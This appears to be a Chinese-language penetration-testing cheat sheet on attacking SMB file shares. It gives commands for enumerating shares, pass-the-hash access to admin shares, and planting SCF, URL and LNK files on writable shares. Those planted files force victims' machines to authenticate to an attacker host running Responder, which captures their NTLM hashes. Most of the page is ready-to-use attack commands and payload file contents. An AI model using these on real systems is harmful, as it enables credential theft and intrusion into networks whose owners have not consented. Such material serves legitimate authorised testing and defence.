共享

某些共享无需身份验证即可访问,探索它们以找到一些有趣的文件

smbmap

https://github.com/ShawnDEvans/smbmap
>smbmap -H 10.10.10.10                
>smbmap -H 10.10.10.10 -R             # 递归列表
>smbmap -H 10.10.10.10 -u invaliduser 
>smbmap -H 10.10.10.10 -d "DOMAIN.LOCAL" -u "USERNAME" -p "Password123*"

pth-smbclient from path-toolkit

https://github.com/byt3bl33d3r/pth-toolkit
>pth-smbclient -U "AD/ADMINISTRATOR%aad3b435b51404eeaad3b435b51404ee:2[...]A" //192.168.10.100/Share
>pth-smbclient -U "AD/ADMINISTRATOR%aad3b435b51404eeaad3b435b51404ee:2[...]A" //192.168.10.100/C$
>ls  # 列文件
>cd  # 切换目录
>get # 下载
>put # 上传

smbclient from Impacket

https://github.com/SecureAuthCorp/impacket
>smbclient -I 10.10.10.100 -L ACTIVE -N -U ""

针对可写共享的 SCF 和 URL 文件攻击

https://github.com/mdsecactivebreach/Farmer
https://github.com/mdsecactivebreach/Farmer/tree/main/crop
>farmer.exe <port> [seconds] [output]
>farmer.exe 8888 0 c:\windows\temp\test.tmp # undefinitely
>farmer.exe 8888 60 # one minute
Crop 可用于创建各种文件,这些文件将触发 SMB/WebDAV 连接,以便在哈希收集攻击期间中毒文件共享
>crop.exe <output folder> <output filename> <WebDAV server> <LNK value> [options]
>Crop.exe \\\\fileserver\\common mdsec.url \\\\workstation@8888\\mdsec.ico
>Crop.exe \\\\fileserver\\common mdsec.library-ms \\\\workstation@8888\\mdsec

SCF文件

@something.scf文件写入以下内容
[Shell]
Command=2
IconFile=\\10.10.10.10\Share\test.ico
[Taskbar]
Command=ToggleDesktop
然后监听
>responder -wrf --lm -v -I eth0
使用crackmapexec:
>crackmapexec smb 10.10.10.10 -u username -p password -M scuffy -o NAME=WORK SERVER=IP_RESPONDER #scf
>crackmapexec smb 10.10.10.10 -u username -p password -M slinky -o NAME=WORK SERVER=IP_RESPONDER #lnk
>crackmapexec smb 10.10.10.10 -u username -p password -M slinky -o NAME=WORK SERVER=IP_RESPONDER CLEANUP

URL文件

.url文件写入以下内容
[InternetShortcut]
URL=whatever
WorkingDirectory=whatever
IconFile=\\10.10.10.10\%USERNAME%.icon
IconIndex=1
然后监听
>responder -I eth0 -v

最后更新于